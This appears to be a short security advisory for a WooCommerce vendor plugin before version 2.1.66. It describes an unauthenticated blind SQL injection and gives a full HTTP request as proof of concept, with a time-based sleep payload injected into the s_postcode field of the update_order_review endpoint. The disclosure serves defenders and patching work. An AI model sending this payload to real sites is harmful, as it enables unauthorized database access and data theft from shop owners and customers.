WooCommerce Products Vendor < 2.1.66 – Unauthenticated Blind SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

POST /?wc-ajax=update_order_review HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 289
DNT: 1
Connection: close

security=4b35909fe6&payment_method=bacs&country=US&state=AL&postcode=1007&city=test&address=test&address_2=test&s_country=US&s_state=AL&s_postcode=-7028')+OR+5792%3dsleep(10)--+sVzc&s_city=128&s_address=test&s_address_2=test&has_full_address=true&post_data=&shipping_method%5B0%5D=flat_rate%3A1